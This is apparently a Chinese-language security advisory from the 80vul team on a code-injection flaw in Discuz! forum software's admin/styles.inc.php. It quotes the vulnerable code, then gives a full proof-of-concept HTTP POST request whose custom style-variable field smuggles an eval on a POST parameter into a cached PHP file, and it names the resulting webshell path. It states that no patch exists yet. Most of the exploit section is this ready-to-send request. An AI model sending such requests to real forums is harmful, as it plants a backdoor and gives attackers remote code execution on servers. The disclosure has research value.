Discuz! admin\styles.inc.php get-webshell bug

author: ring04h

team:http://www.80vul.com

由于Discuz!的admin\styles.inc.php里preg_match正则判断$newcvar变量操作不够严谨，导致执行代码漏洞.

一 分析

在文件admin\styles.inc.php里代码:

               if($newcvar && $newcsubst) {
                       if($db->result_first("SELECT COUNT(*) FROM {$tablepre}stylevars WHERE variable='$newcvar' AND styleid='$id'")) {
                               cpmsg('styles_edit_variable_duplicate', '', 'error');
                       } elseif(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) {
                               cpmsg('styles_edit_variable_illegal', '', 'error');

                       }
                       $newcvar = strtolower($newcvar);
                       $db->query("INSERT INTO {$tablepre}stylevars (styleid, variable, substitute)
                               VALUES ('$id', '$newcvar', '$newcsubst')");
               }

上面代码可以看出来当有后台权限时,可通过编辑风格,自定义模板变量处插入<strong> !','80VUL');eval_r($_POST[RING]);// </strong> 替换出插入 exp by ring04h!，远程写入webshell执行代码.

二 利用
POC:
step1:
POST /bbs/admincp.php?action=styles HTTP/1.1

Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, **

Referer: http://www.80vul.com/bbs/admincp.php?action=styles&operation=edit&id=6

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Host: www.80vul.com

Content-Length: 1402

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: 

formhash=99238f2d&anchor=&namenew=exp&templateidnew=1&stylevar%5B249%5D=1&stylevar%5B247%5D=&stylevar%5B248%5D=&stylevar%5B246%5D=&stylevar%5B250%5D=&stylevarbgimg%5B250%5D=&stylevarbgextra%5B250%5D=&stylevar%5B251%5D=&stylevarbgimg%5B251%5D=&stylevarbgextra%5B251%5D=&stylevar%5B252%5D=&stylevarbgimg%5B252%5D=&stylevarbgextra%5B252%5D=&stylevar%5B253%5D=&stylevar%5B254%5D=&stylevar%5B255%5D=&stylevar%5B256%5D=&stylevar%5B257%5D=&stylevar%5B258%5D=&stylevar%5B259%5D=&stylevar%5B260%5D=&stylevar%5B261%5D=&stylevar%5B262%5D=&stylevar%5B263%5D=&stylevar%5B264%5D=&stylevar%5B265%5D=&stylevar%5B266%5D=&stylevar%5B267%5D=&stylevar%5B268%5D=&stylevar%5B269%5D=&stylevar%5B270%5D=&stylevar%5B271%5D=&stylevar%5B272%5D=&stylevar%5B273%5D=&stylevar%5B274%5D=&stylevar%5B275%5D=&stylevarbgimg%5B275%5D=&stylevarbgextra%5B275%5D=&stylevar%5B276%5D=&stylevar%5B277%5D=&stylevar%5B278%5D=&stylevar%5B279%5D=&stylevar%5B280%5D=&stylevar%5B281%5D=&stylevar%5B282%5D=&stylevar%5B283%5D=&stylevarbgimg%5B283%5D=&stylevarbgextra%5B283%5D=&stylevar%5B284%5D=&stylevarbgimg%5B284%5D=&stylevarbgextra%5B284%5D=&stylevar%5B285%5D=&stylevarbgimg%5B285%5D=&stylevarbgextra%5B285%5D=&stylevar%5B286%5D=&stylevar%5B287%5D=&stylevar%5B288%5D=&stylevar%5B289%5D=&stylevar%5B290%5D=&stylevar%5B291%5D=&newcvar=%21%27%2C%2780vul%27%29%3Beval%28%24_post%5Bring%5D%29%3B%2F%2F&newcsubst=exp+by+ring04h%21&editsubmit=%CC%E1%BD%BB

webshell:
http://www.80vul.com/bbs/forumdata/cache/style_6.php 



三 补丁[fix]

该漏洞已提交，等待官方补丁.（大璞不完） 

[相关链接]

原始链接：http://www.80vul.com/dzvul/sodb/18/sodb-2009-02.txt

Discuz!7.1-7.2 高危漏洞 官方已发布补丁(2010-01-10 13:10:25)

正在进行时：Discuz!曝高危漏洞 国内大型BBS遭洗劫(2010-01-10 19:51:32)

Disccuz!门：两核心始作俑者的身份已核实(2010-01-10 20:43:18)